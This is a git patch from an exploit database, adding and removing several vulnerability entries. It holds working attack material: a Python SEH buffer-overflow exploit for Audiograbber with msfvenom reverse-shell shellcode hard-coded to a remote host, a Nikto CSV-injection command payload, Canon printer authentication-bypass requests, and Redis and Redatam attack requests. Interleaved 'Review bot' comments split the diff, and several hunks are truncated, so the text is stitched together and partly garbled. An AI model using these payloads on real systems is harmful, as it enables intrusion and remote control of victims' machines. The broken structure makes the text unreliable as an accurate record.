From 086cfb2c761020d76385673216acdb3c2dae8efe Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 19 Jun 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-06-19 16 changes to exploits/shellcodes Nikto 2.1.6 - CSV Injection Pale Moon Browser < 27.9.3 - Use After Free (PoC) Audiograbber 1.83 - Local Buffer Overflow (SEH) Redis-cli < 5.0 - Buffer Overflow (PoC) Microsoft COM for Windows - Privilege Escalation Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass Canon MF210/MF220 - Authenticaton Bypass Canon LBP7110Cw - Authentication Bypass Canon LBP6030w - Authentication Bypass Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery Redatam Web Server < 7 - Directory Traversal --- exploits/hardware/webapps/44844.txt | 184 ---------------- exploits/hardware/webapps/44845.txt | 323 ---------------------------- exploits/hardware/webapps/44885.txt | 39 ---- exploits/hardware/webapps/44886.txt | 38 ---- exploits/linux/local/44899.txt | 52 +++++ exploits/linux/local/44904.py | 21 ++ exploits/linux/webapps/44902.txt | 24 +++ exploits/php/webapps/44901.html | 37 ++++ exploits/windows/local/44900.txt | 37 ++++ exploits/windows/local/44903.py | 110 ++++++++++ exploits/windows/local/44906.txt | 11 + exploits/windows/webapps/44905.txt | 90 ++++++++ files_exploits.csv | 12 +- 13 files changed, 390 insertions(+), 588 deletions(-) delete mode 100644 exploits/hardware/webapps/44844.txt delete mode 100644 exploits/hardware/webapps/44845.txt delete mode 100644 exploits/hardware/webapps/44885.txt delete mode 100644 exploits/hardware/webapps/44886.txt create mode 100644 exploits/linux/local/44899.txt create mode 100755 exploits/linux/local/44904.py create mode 100644 exploits/linux/webapps/44902.txt create mode 100644 exploits/php/webapps/44901.html create mode 100644 exploits/windows/local/44900.txt create mode 100755 exploits/windows/local/44903.py create mode 100644 exploits/windows/local/44906.txt create mode 100644 exploits/windows/webapps/44905.txt 
diff --git a/exploits/hardware/webapps/44844.txt b/exploits/hardware/webapps/44844.txt deleted file mode 100644 index 323724488..000000000 --- a/exploits/hardware/webapps/44844.txt +++ /dev/null 
@@ -1,184 +0,0 @@ -# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] -# Date: [3.6.2018] -# Exploit Author: [Huy Kha] -# Vendor Homepage: [http://global.canon.com] -# Software Link: [ Website ] -# Severity: High -# Version: LBP6650, LBP3370, LBP3460, LBP7750C -# Tested on: Mozilla FireFox - -# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. -It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. - - - -# PoC : -Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. -You can recognize them with the /tlogin.cgi parameter, but the version is -also been displayed on the webinterface. -https://imgur.com/a/QE3GfLw - -# Example : - -1. Go to the following url: http://127.0.0.1/tlogin.cgi -2. Click on Administrator Mode -3. Intercept now the request with Burpsuite and click on 'Ok'' to login. -And forward the request till you get the ''/frame.cgi?page=DevStatus'' -parameter. - - -# Request : - -GET /frame.cgi?page=DevStatus HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://127.0.0.1/tlogin.cgi -Cookie: CookieID=1610705327:; Login=11 -Connection: close -Upgrade-Insecure-Requests: 1 - -# Response : - -HTTP/1.1 200 OK -Date: MON, 05 JAN 1970 16:35:57 GMT -Server: CANON HTTP Server -Content-Type: text/html -Content-Length: 5652 - - - - - - - - - - - - - - - - - - - - -<body> -</body> - - - - - - -# Do we have now access to the printer with Admin Mode? : Yes - -# How to fix this? : Remove the default password and add a new (strong) password. - - -# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode) \ No newline at end of file 
diff --git a/exploits/hardware/webapps/44845.txt b/exploits/hardware/webapps/44845.txt deleted file mode 100644 index 8876ca087..000000000 --- a/exploits/hardware/webapps/44845.txt +++ /dev/null 
@@ -1,323 +0,0 @@ -# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ] -# Date: [4.6.2018] -# Exploit Author: [Huy Kha] -# Vendor Homepage: [http://global.canon.com] -# Software Link: [ Website ] -# Version: MF210 & MF20 Series -# Severity: High -# Tested on: Mozilla FireFox -# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface. -It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication. - - - -# PoC : -Start searching for Canon MF210 & MF220 printers. -You can recognize them with the /login.html parameter, but the version is -also been displayed on the webinterface. -https://imgur.com/a/5ON4HF6 - -# Example : - -1. Go to the following url: http://127.0.0.1/login.html -2. Click on System Manager Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter. - - -# Request : - -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://129.2.52.116/login.html -Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC -Connection: close -Upgrade-Insecure-Requests: 1 - -# Response : - -HTTP/1.1 200 OK -Expires: Thu, 1 Jan 1998 00:00:00 GMT -Content-Type: text/html -Content-Length: 6119 -Pragma: no-cache -Cache-Control: no-store, no-cache, max-age=0 -Connection: close -Set-Cookie: -fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly - - - - - - - - - - - - - - - - - - -Remote UI: Portal: MF220 Series: MF220 Series - - -
-
-
-
-

- - - - - -

-
- - ---- - - - - - - - - - - - - - - -
Device Name:MF220 Series
Product Name:MF220 Series
Location:
-
-
-
-
- -

Log Out

-
-
-
-
-
-
-
-
-

Remote UI: Portal

- -
-
-
-
-
-
-
-
-

Device Info

-
-
Last Updated:06/04/2018 04:27 AM
-
- -
-
-
-
-

Contents

-
-

-
-
-

Device Basic Information

-
-
Device Status
- ---- - - - - - - - - - - - - - - - - -
Printer: -Sleep mode. -
Scanner: -Sleep mode. -
Fax: -Ready to send or receive faxes. -
-
-
-
Error Information
-

No errors.

- -
-
-
-

Consumables Information

-
- -
Paper Information
- ------ - - - - - - - - - - - - - - - - - - - - - - - - - - -
Paper SourcePaper LevelPaper SizePaper Type
Multi-Purpose TrayNoneLTRPlain (16 lb Bond-23 lb Bond)
Drawer 1OKLTRPlain (16 lb Bond-23 lb Bond)
-
-
-
Cartridge Information
- ---- - - - - - - - - - - - - -
ColorLevel
Black60%
-
-
-
-

Support Link

-
- ---- - - - - - - - - -
Support Link:
-
-
-
-
-
-
-
- -
-
-
-
-
-
Copyright CANON INC. 2014
-
-
- - - - - - -# Do we have now access to the printer with System Manager Mode? : Yes - -# Screenshot : https://imgur.com/a/U6oBYNV - -# How to fix this? : Remove the default password and add a new (strong) password. \ No newline at end of file diff --git a/exploits/hardware/webapps/44885.txt b/exploits/hardware/webapps/44885.txt deleted file mode 100644 index b55be406c..000000000 --- a/exploits/hardware/webapps/44885.txt +++ /dev/null 
@@ -1,39 +0,0 @@ -# Exploit Title: Canon LBP7110Cw - Authentication Bypass -# Date: 2018-06-07 -# Exploit Author: Huy Kha -# Vendor Homepage: http://global.canon.com -# Version: LBP7110Cw -# CVE: CVE-2018-12049 -# Severity: High (Leads to full System Manager Mode account take-over) - -# Description : A remote attacker can bypass the Management Mode on the -# Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via -# vectors involving /portal_top.html to get full access to the device. - -# PoC : -# As you can see when we're type a random password. -# You'll get an error for an incorrect authentication. -# Now with a simple request, we can bypass the authentication -# and get full access to the printer with ''Management Mode'' - -1. Go to the following url: http://TargetURL/ -2. Click on Management Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to -login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request -to the GET /portal_top.html HTTP/1.1 - -# Request : -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://164.125.112.38/ -Cookie: sessid=QegLH5ETb92HEEPWr55AiA## -Connection: close -Upgrade-Insecure-Requests: 1 - -# Do we have now access to the printer with Management Mode? : Yes -# Impact: A remote attacker can have take-over the whole printer \ No newline at end of file diff --git a/exploits/hardware/webapps/44886.txt b/exploits/hardware/webapps/44886.txt deleted file mode 100644 index 45cc57b01..000000000 --- a/exploits/hardware/webapps/44886.txt +++ /dev/null 
@@ -1,38 +0,0 @@ -# Exploit Title: Canon LBP6030w - Authentication Bypass -# Date: 2018-06-07 -# Exploit Author: Huy Kha -# Vendor Homepage: http://global.canon.com -# Version: LBP6030w -# Severity: High (Leads to full System Manager Mode account take-over) -# CVE: CVE-2018-12049 - -# Description : A remote attacker can bypass the System Manager Mode on the -# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors -# involving /portal_top.html to get full access to the device. - -# PoC : -# Now with a simple request, we can bypass the authentication and get full -# access to the printer with ''System Manager Mode'' - -1. Go to the following url: http://TargetURL/ -2. Click on System Manager Mode -3. Intercept now the request with Burpsuite and click then on 'Ok'' to -login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to -the GET /portal_top.html HTTP/1.1 - -# Request : -GET /portal_top.html HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 -Firefox/52.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://23.125.171.217/ -Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ## -Connection: close -Upgrade-Insecure-Requests: 1 - -# Do we have now access to the printer with System Manager? : Yes -# Impact: A remote attacker can have take-over the whole printer if there -# is no PIN set by a user. \ No newline at end of file diff --git a/exploits/linux/local/44899.txt b/exploits/linux/local/44899.txt new file mode 100644 index 000000000..b1f0395c9 --- /dev/null +++ b/exploits/linux/local/44899.txt 
@@ -0,0 +1,52 @@
+# Exploit Title: Nikto 2.1.6 - CSV Injection
+# Google Dork: N/A
+# Date: 2018-06-01
+# Exploit Author: Adam Greenhill
+# Vendor Homepage: https://cirt.net/Nikto2
+# Software Link: https://github.com/sullo/nikto
+# Affected Version: 2.1.6, 2.1.5
+# Category: Applications
+# Tested on: Kali Linux 4.14 x64
+# CVE : CVE-2018-11652
+
+# Technical Description:
+# CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers
+# to inject arbitrary OS commands via the Server field in an HTTP response header,
+# which is directly injected into a CSV report.
+
+# PoC
+# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
+# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:
+
+user www-data;
+worker_processes auto;
+pid /run/nginx.pid;
+include /etc/nginx/modules-enabled/*.conf;
+
+events {
+ worker_connections 768;
+ # multi_accept on;
+}
+
+http {
+ server_tokens off; # removed pound sign
+ more_set_headers "Server: =cmd|' /C calc'!'A1'";
+
+ server {
+ listen 80;
+
+ server_name localhost;
+
+ location /hello {
+ return 200 "hello world";
+ }
+ }
+}
+
+# Restart the server: service nginx restart
+# Scan the nginx server with Nikto configured to output the results to a CSV file:
+
+nikto -h :80 -o vuln.csv
+
+# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting
+# to execute
\ No newline at end of file
diff --git a/exploits/linux/local/44904.py b/exploits/linux/local/44904.py
new file mode 100755
index 000000000..188704170
--- /dev/null
+++ b/exploits/linux/local/44904.py
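Review bot: The scan command `nikto -h :80 -o vuln.csv` has no host before the colon, so as written it cannot be run; the target appears to have been lost and the line should read something like `nikto -h 127.0.0.1:80 -o vuln.csv`, matching the `listen 80` / `server_name localhost` block above it. The `more_set_headers` directive comes from the headers-more module and is unknown to stock nginx, which is the real reason `nginx-extras` is installed — the install comment should say so, otherwise a reader on plain nginx gets a config error and concludes the PoC is broken. The stray `# removed pound sign` after `server_tokens off;` should be dropped or explained. `# Affected Version: 2.1.6, 2.1.5` and the description's "2.1.6 and earlier" disagree on scope; one of the two should be made precise.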
@@ -0,0 +1,21 @@
+# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)
+# Date: 2018-06-13
+# Exploit Author: Fakhri Zulkifli
+# Vendor Homepage: https://redis.io/
+# Software Link: https://redis.io/download
+# Version: 5.0, 4.0, 3.2
+# Fixed on: 5.0, 4.0, 3.2
+# CVE : CVE-2018-12326
+
+# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker
+# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.
+
+$ ./src/redis-cli -h `python -c 'print "A" * 300'`
+Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known
+
+#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566
+#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637
+#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5
+#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9
+#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
+#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)
\ No newline at end of file
diff --git a/exploits/linux/webapps/44902.txt b/exploits/linux/webapps/44902.txt
new file mode 100644
index 000000000..32331887f
--- /dev/null
+++ b/exploits/linux/webapps/44902.txt
@@ -0,0 +1,24 @@
+# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
+# Date: 2018-06-17
+# Author: Dolev Farhi
+# Vendor or Software Link: www.rabbitmq.com
+# Version: 3.7.6
+# Tested on: Ubuntu
+
+
+
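Review bot: `# Version: 5.0, 4.0, 3.2` and `# Fixed on: 5.0, 4.0, 3.2` list the same releases, so the header never says which builds are vulnerable and which carry the fix; the `Fixed on` line should name the patched point releases (the title's `< 5.0` suggests the 5.0 line was fixed before GA — please confirm against the vendor advisory for CVE-2018-12326). The privilege-escalation wording is not supported by what is shown: the trace is a `snprintf` overflow inside redis-cli's own `repl()` (redis-cli.c:1624) on a hostname the invoking user typed, so it only crosses a privilege boundary when a more privileged process runs redis-cli with attacker-controlled `-h`, and that precondition should be stated. The file ships as `44904.py` and is indexed as Python, but it contains a shell transcript and an ASan backtrace, so a `.txt` extension would be more honest than a script that cannot run.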

Add RabbitMQ Admin

+ + +
+ + + + +
+ + + + + \ No newline at end of file diff --git a/exploits/php/webapps/44901.html b/exploits/php/webapps/44901.html new file mode 100644 index 000000000..f84a9303b --- /dev/null +++ b/exploits/php/webapps/44901.html @@ -0,0 +1,37 @@ +# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery +# Date: 2018-06-15 +# Exploit Author: L0RD +# Vendor Homepage: https://www.jomres.net/ +# Software link: https://extensions.joomla.org/extension/jomres/ +# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip +# Version: 9.11.2 +# Tested on: Kali linux +=================================================== +# POC : + + + + CSRF POC + + +
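Review bot: The title says `< 3.7.6` while the header says `# Version: 3.7.6`, so it is unclear whether 3.7.6 is the last vulnerable release or the fixed one; the header should read `# Version: < 3.7.6 (fixed in 3.7.6)` or whichever the vendor changelog confirms. The form markup has not survived in this copy of the hunk (only the `Add RabbitMQ Admin` button text remains), so the forged endpoint and the parameters it sets cannot be reviewed here. A one-line `# Description:` naming the management-UI endpoint and the precondition that the victim's browser holds valid management credentials would make the entry self-explanatory like the other CSRF entries in this commit.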
+ + + + + + + + + + + + +
+ + + + +=================================================== \ No newline at end of file diff --git a/exploits/windows/local/44900.txt b/exploits/windows/local/44900.txt new file mode 100644 index 000000000..faf6640a0 --- /dev/null +++ b/exploits/windows/local/44900.txt @@ -0,0 +1,37 @@ +# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC) +# Date: 2018-06-13 +# Author - Berk Cem Goksel +# Vendor Homepage: https://www.palemoon.org/ +# Software Link: https://www.palemoon.org/palemoon-win32.shtml +# Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2) +# Tested on: Windows 10 +# Category: Windows Remote Exploit +# CVE : CVE-2018-12292 + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/44903.py b/exploits/windows/local/44903.py new file mode 100755 index 000000000..1d1705d12 --- /dev/null +++ b/exploits/windows/local/44903.py 
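Review bot: The entry never says what the forged request does — the title is bare `Cross site request forgery` and there is no `# Description` line — whereas sibling index entries name the action (`(Add User)`, `(Send Email)`); please state the targeted jomres action and that the victim must be logged in with sufficient rights for it. The form markup is missing from this copy of the hunk, so the request itself cannot be reviewed here. `Joomla!Component` in the title is also missing a space and should match the index spelling `Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery`.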
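Review bot: `# Category: Windows Remote Exploit` conflicts with the file being placed under `exploits/windows/local/` and indexed as `local`; a use-after-free reached by loading a page is a client-side (remote) issue, so either the header or the index classification should change — please confirm which the database intends. The HTML/JS that triggers the UAF is not present in this copy of the hunk (only the header survives), so the trigger cannot be reviewed here. A `# Description:` line stating the DOM/JS operation involved and whether the PoC only crashes the browser, as `(PoC)` implies, would help triage.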
@@ -0,0 +1,110 @@ +# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH) +# Date: 2018-06-16 +# Exploit Author: Dennis 'dhn' Herrmann +# Vendor Homepage: https://www.audiograbber.org/ +# Version: 1.83 +# Tested on: Windows 7 SP1 (x86) + +#!/usr/bin/env python +# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $ +# +# Tested with Windows 7 SP1 (x86) +# Steps: +# - Paste "poc.txt" content in the "Interpret" or "Album" field + +class Exploit: + + def __init__(self, shellcode): + self._shellcode = shellcode + self._payload = None + + def __write(self): + f = open("poc.txt", "w") + f.write(self._payload) + f.close() + + def run(self): + pattern = "A" * 256 + jmp_short = "\xeb\x08\x90\x90" # short JMP + pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll + + self._payload = pattern + self._payload += jmp_short + self._payload += pop2ret + + # The buffer is mangled so we have to jump + # over the parts to reached our shellcode + self._payload += "\x90" * 18 + jmp_short + self._payload += "\x90" * 28 + jmp_short + self._payload += "\x90" * 32 + self._shellcode + + self.__write() + +def main(): + # msfvenom --platform windows -p windows/shell_reverse_tcp \ + # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \ + # -e x86/alpha_mixed -f py + shellcode = ( + "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51" + "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" + "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50" + "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77" + "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61" + "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50" + "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32" + "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b" + "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c" + "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b" + "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50" + 
"\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32" + "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b" + "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47" + "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b" + "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78" + "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75" + "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71" + "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34" + "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e" + "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74" + "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45" + "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61" + "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64" + "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42" + "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33" + "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47" + "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47" + "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79" + "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56" + "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70" + "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a" + "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48" + "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f" + "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37" + "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68" + "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e" + "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c" + "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d" + "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46" + "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76" + "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37" + "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30" + "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51" + "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36" + "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f" + 
"\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36" + "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67" + "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65" + "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d" + "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a" + "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77" + "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43" + "\x6b\x4f\x69\x45\x41\x41" + ) + + exploit = Exploit(shellcode) + exploit.run() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/44906.txt b/exploits/windows/local/44906.txt new file mode 100644 index 000000000..d27a5de06 --- /dev/null +++ b/exploits/windows/local/44906.txt 
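Review bot: `__write` opens `poc.txt` in text mode and writes a `str` containing bytes above 0x7f (`\xda`, `\xeb`, `\x91`, …); that is byte-exact only under Python 2 — under Python 3 each such character is UTF-8 encoded and the SEH overwrite and short jumps no longer land — and the `#!/usr/bin/env python` shebang is ineffective because it sits after the header comments rather than on line 1. Either move the shebang to the first line and pin `python2`, or write binary with `with open("poc.txt", "wb") as f: f.write(self._payload)` and make the pattern, `jmp_short`, `pop2ret`, NOP sleds and shellcode `bytes` literals. The shellcode has `LHOST=10.168.142.129 LPORT=443` baked in, so users must regenerate it with the quoted msfvenom command; a comment saying so above `shellcode = (` would prevent a silent no-connect. The `pop2ret` gadget `0x10019179` in `WMA8Connect.dll` is presumably specific to the 1.83 build tested — TODO confirm the module is not rebased on other installs.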
@@ -0,0 +1,11 @@
+Writeup: https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
+
+In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
+
+A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
+
+The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44906.zip
\ No newline at end of file
diff --git a/exploits/windows/webapps/44905.txt b/exploits/windows/webapps/44905.txt
new file mode 100644
index 000000000..ccbf563f1
--- /dev/null
+++ b/exploits/windows/webapps/44905.txt
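Review bot: The writeup URL ends in `cve-2018-0624.html` while the text refers to CVE-2018-0824; one of the two looks transposed, so please verify the link resolves and correct whichever is wrong. The entry has none of the `# Exploit Title` / `# Version` / `# Tested on` header lines the other files in this commit carry, and the PoC is an opaque zip fetched from a separate repository, so a reader cannot tell which Windows builds the privilege escalation was confirmed on or what the archive contains; a short header plus a listing of the archive contents would fix that.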
@@ -0,0 +1,90 @@ +# Exploit Title: Redatam Web Server < 7 - Directory Traversal +# Google Dork: inurl: /redbin/rpwebutilities.exe/ +# Date: 2018-06-18 +# Exploit Author: Berk Dusunur +# Vendor Homepage: http://redatam.org/redatam/en/index.html +# Software Link: https://www.cepal.org/en/topics/redatam/download-redatam +# Version: before V6 +# Tested on: Pardus Windows AppServ +# CVE : N/A + +# Proof of Concept +# Redatam web server windows server running LFN parameter affected by directory traversal +# Making a wrong request causes directory leak + +# Request + +GET /redbin/rpwebutilities.exe/text?LFN=blablabla%00.htm&TYPE=TMP HTTP/1.1 +Host: 192.168.1.104 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# Response + +HTTP/1.1 500 Internal Server Error +Date: Mon, 18 Jun 2018 10:04:44 GMT +Server: Apache/2.4.23 (Win32) PHP/5.6.25 +Content: +Content-Length: 416 +Connection: close +Content-Type: text/html + + + + + +

R+SP WebUtilities Exception

+

Error Number [401]

+

Error Message

+

